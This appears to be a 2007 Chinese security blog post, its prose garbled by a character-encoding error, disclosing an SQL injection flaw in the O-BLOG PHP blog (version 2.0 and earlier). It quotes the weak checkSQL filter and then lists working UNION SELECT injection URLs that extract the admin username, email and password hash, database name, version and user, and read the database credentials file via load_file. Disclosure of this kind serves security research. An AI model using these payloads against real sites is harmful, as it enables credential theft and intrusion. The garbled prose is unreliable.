O-BLOG checkSQL¹ýÂ˲»ÑÏ©¶´

O-BLOG checkSQL¹ýÂ˲»ÑÏ©¶´ - ÍøÂ簲ȫ - µçÄԽ̳ÌÍø

O-BLOG checkSQL¹ýÂ˲»ÑÏ©¶´

ÈÕÆÚ£º2007-06-02   ¼ö£º
Ê×ÏȸÐл°ïÖúÎÒµÄÐÖµÜÃÇ£ºÔÆÊæ´ó¸ç¡¢superhei¡¢kevin1986£¬Ã»ÓÐÄãÃÇ£¬ÎÒʼÖÕÊǸö²ËÄñ°¡¡££º£©

©¶´·¢ÏÖÈÕÆÚ:2005.7.1
©¶´Éæ¼°°æ±¾:O-BLOG¡¡ Version <= 2.0
¹Ù·½ÍøÕ¾£ºhttp://www.phpBlog.cn
©¶´·ÖÎö¼°ÀûÓÃ:

config.PHP
----------------------¿É°®µÄ·Ö¸îÏß(͵wofeiwoµÄ)-----------------------------
[codz begin]
function checkSQL($content)
{
$char = array("'","or","and");//¹ýÂ˲»ÑÏ
for($i=0;$i if(strstr($content,$char[$i])) {
die();
}
}
Return $content;
}

[codz end]
----------------------¿É°®µÄ·Ö¸îÏß-----------------------------

blog.php
----------------------¿É°®µÄ·Ö¸îÏß(͵wofeiwoµÄ)-----------------------------
[codz begin]


if(isset($_GET['do']))
{
$ac = checkSQL($_GET['do']);

if($ac == 'showclass')
{
@$classid = checkSQL($_GET['classid']);
require('class/show_one_class.php');
}
elseif($ac == 'ShowOneDayBlog')
{
@$date = checkSQL($_GET['date']);
require('class/show_one_day_blog.php');
$main = $OneDayBlogData;
}

...............

[codz end]
----------------------¿É°®µÄ·Ö¸îÏß-----------------------------

ÎÒÃÇ¿ÉÒÔͨ¹ý´óСд¡¢unionµÈÈƹý¼ì²é,²ì¿´ob_admin±íÖеÄÃô¸ÐÐÅÏ¢
±í½á¹¹ÈçÏ£º
------------------------------------------------------

//½¨Á¢±í ob_admin
$sql[] = "CREATE TABLE `ob_admin` (
`username` varchar(15) default 'admin',
`passWord` varchar(40) default '21232f297a57a5a743894a0e4a801fc3',
`email` varchar(100) default '[email protected]',
`homepage` varchar(100) default 'http://shirui.org',
`QQ` varchar(30) default '5194913',
`MSN` varchar(100) default '[email protected]',
`icq` varchar(100) default '123456789',
`remark` text
) TYPE=MyISAM;";

//µ¼ÈëÊý¾Ý ob_admin
$sql[] = "INSERT INTO `ob_admin` VALUES ('admin', '21232f297a57a5a743894a0e4a801fc3', '[email protected]', 'http://shirui.org', '5194913', '[email protected]', '123456789', 'Õâ¼Ò»ïºÜÀÁ£¬Ê²Ã´¶¼Ã»ÁôÏÂ.');";
-----------------------------------------------

»ñÈ¡Óû§Êý¾Ý£º
»ñÈ¡ÓÊÏä/blog.php?id=1%20union%20select%201,1,1,email,1%20from%20ob_admin
»ñÈ¡Óû§Ãû/blog.php?id=1%20union%20select%201,1,1,username,1%20from%20ob_admin
»ñÈ¡ÃÜÂ룬md5¼ÓÃܵÄ/blog.php?id=1%20union%20select%201,1,1,PASSWORD,1%20from%20ob_admin
×¢Ò⣺ÕâÀïpasswordÒª´óд£¬ÎÒҲûÕÒµ½Ô­Òò£¬Èç¹ûÄãÖªµÀÇë¸æËßÎÒBlog: http://wmjie.51.net/swords/

»ñÈ¡Êý¾Ý¿âÊý¾Ý£º
»ñÈ¡Êý¾Ý¿âÃû/blog.php?id=31%20union%20select%201,1,1,database(),1%20from%20ob_admin
»ñÈ¡Êý¾Ý¿â°æ±¾/blog.php?id=31%20union%20select%201,1,1,version(),1%20from%20ob_admin
»ñÈ¡Êý¾Ý¿âµ±Ç°Óû§/blog.php?id=31%20union%20select%201,1,1,CURRENT_USER(),1%20from%20ob_admin

»ñÈ¡ÎļþÃô¸ÐÊý¾Ý£¨ÐëÖªµÀÎïÀí·¾¶£¬ÆäÖÐpath¼´¸ùĿ¼ÎïÀí·¾¶£©£º
/blog.php?id=31%20union%20select%201,1,1,loadfile('/path/blog/admin/mysql.php'),1%20from%20ob_admin

(kevin1986:ºÃÏó·ÇrootÓû§Ä¬ÈÏÇé¿ö϶¼Ã»ÓжÁÎļþµÄȨÏÞ)
ÆäÖÐadmin/mysql.phpÊÇÊý¾Ý¿âÁ¬½ÓµÄËùÓÐÐÅÏ¢£¡

£¨³ö´¦£ºhttp://www.sheup.com£©




±êÇ©£º